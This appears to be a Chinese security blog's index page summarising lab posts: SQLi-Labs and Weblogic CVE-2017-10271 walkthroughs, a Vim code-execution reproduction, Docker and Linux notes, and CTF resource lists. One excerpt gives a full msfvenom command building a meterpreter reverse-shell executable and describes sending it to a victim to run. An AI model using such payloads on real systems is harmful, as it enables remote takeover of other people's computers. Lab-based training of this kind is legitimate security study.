2019年7月23日
SQLi_Labs通关文档【1-65关】
摘要: SQLi_Labs通关文档【1-65关】 为了不干扰自己本机环境,SQL-LAB我就用的码头工人,跑起来的,搭建也非常简单,也就两条命令 docker pull acgpiano/sqli-labsdocker run -dt --name sqli-lab -p [你要映射的端口]:80 acgp 阅读全文
posted @ 2019-07-23 10:43 xyongsec 阅读(6877) 评论(0) 推荐(1)
2019年7月15日
Linux 安装 lanmp
摘要: Lanmp介绍 lanmp一键安装包是wdlinux官网2010年底开始推出的web应用环境的快速简易安装包. 执行一个脚本,整个环境就安装完成就可使用,快速,方便易用,安全稳定 lanmp一键安装包是用shell脚本编写,且是开源的,你也可以根据业务需求,做相应的调整,来安装自己所需要的环境. l 阅读全文
posted @ 2019-07-15 15:22 xyongsec 阅读(4359) 评论(0) 推荐(0)
2019年7月3日
linux 下的init 0,1,2,3,4,5,6知识介绍
摘要: linux 下的init 0,1,2,3,4,5,6知识介绍 一. init是Linux系统操作中不可缺少的程序之一。 所谓的init进程,它是一个由内核启动的用户级进程。 内核自行启动(已经被载入内存,开始运行,并已初始化所有的设备驱动程序和数据结构等)之后,就通过启动一个用户级程序init的方式 阅读全文
posted @ 2019-07-03 11:52 xyongsec 阅读(1617) 评论(0) 推荐(2)
Weblogic(CVE-2017-10271)漏洞复现
摘要: 环境部署 首先下载vulhub项目地址:https://github.com/vulhub/vulhub 进入需要部署的系统环境: 使用docker编译启动(出现done表示已经启动完成) 建议提前给docker配置镜像加速器(方法在另一篇博客) 访问`http://your-ip:7001/`即可 阅读全文
posted @ 2019-07-03 11:44 xyongsec 阅读(6916) 评论(0) 推荐(0)
Ubuntu 配置docker镜像加速器
摘要: 1. 安装/升级Docker客户端 推荐安装1.10.0以上版本的Docker客户端,参考文档 docker-ce 1. 安装/升级Docker客户端 推荐安装1.10.0以上版本的Docker客户端,参考文档 docker-ce 2. 配置镜像加速器 针对Docker客户端版本大于 1.10.0 阅读全文
posted @ 2019-07-03 10:54 xyongsec 阅读(595) 评论(0) 推荐(0)
2019年6月22日
博客园主题美化只需要这几步
摘要: 博客园美化主题需要这几步 本人现用的这套博皮是根据bndong的博客进行修改的,且配置需要时间,有兴趣可以直接访问bndong博客,查看置顶博文进行配置。所有的修改都在博客园后台管理 >设置中,其中js的权限是要申请的。 配置期间如有不懂之处,欢迎随时评论! 我的博客皮肤 【美化方法】 安装配置 本 阅读全文
posted @ 2019-06-22 14:07 xyongsec 阅读(504) 评论(0) 推荐(0)
Kali-利用metasploit中的exploit/multi/handler进行攻击
摘要: 在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台将软件发给客户机上运行,此时ka 阅读全文
posted @ 2019-06-22 13:41 xyongsec 阅读(3083) 评论(0) 推荐(0)
CTF干货合集
摘要: CTF练习平台 http://hackinglab.cn/ 网络信息安全攻防学习平台 http://captf.com/ ctf题目 http://oj.xctf.org.cn/ XCTF_OJ练习平台 http://ctf.3sec.cn/ Jlu.CTF http://www.baimaoxue 阅读全文
posted @ 2019-06-22 13:40 xyongsec 阅读(1153) 评论(0) 推荐(0)
CTF练习资源大全集
摘要: 练习CTF清单/永久CTF清单 以下列出了一些长期运行的CTF实践站点和工具或CTF。谢谢,RSnake用于启动这是基于的原始版本。如果您有任何更正或建议,请随时通过dot com tld在域psifertex上发送电子邮件至ctf。 在线直播游戏推荐 无论是更新,包含高质量的挑战,还是只是有很多深 阅读全文
posted @ 2019-06-22 13:39 xyongsec 阅读(4248) 评论(0) 推荐(0)
丢给你一个txt并同时获取你shell
摘要: 丢给你一个txt并同时获取你shell 0x00:回顾 《文本编辑器Vim/Neovim被曝任意代码执行漏洞》 听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。 git clone https://github.com/numirias/ 阅读全文
posted @ 2019-06-22 13:15 xyongsec 阅读(545) 评论(0) 推荐(0)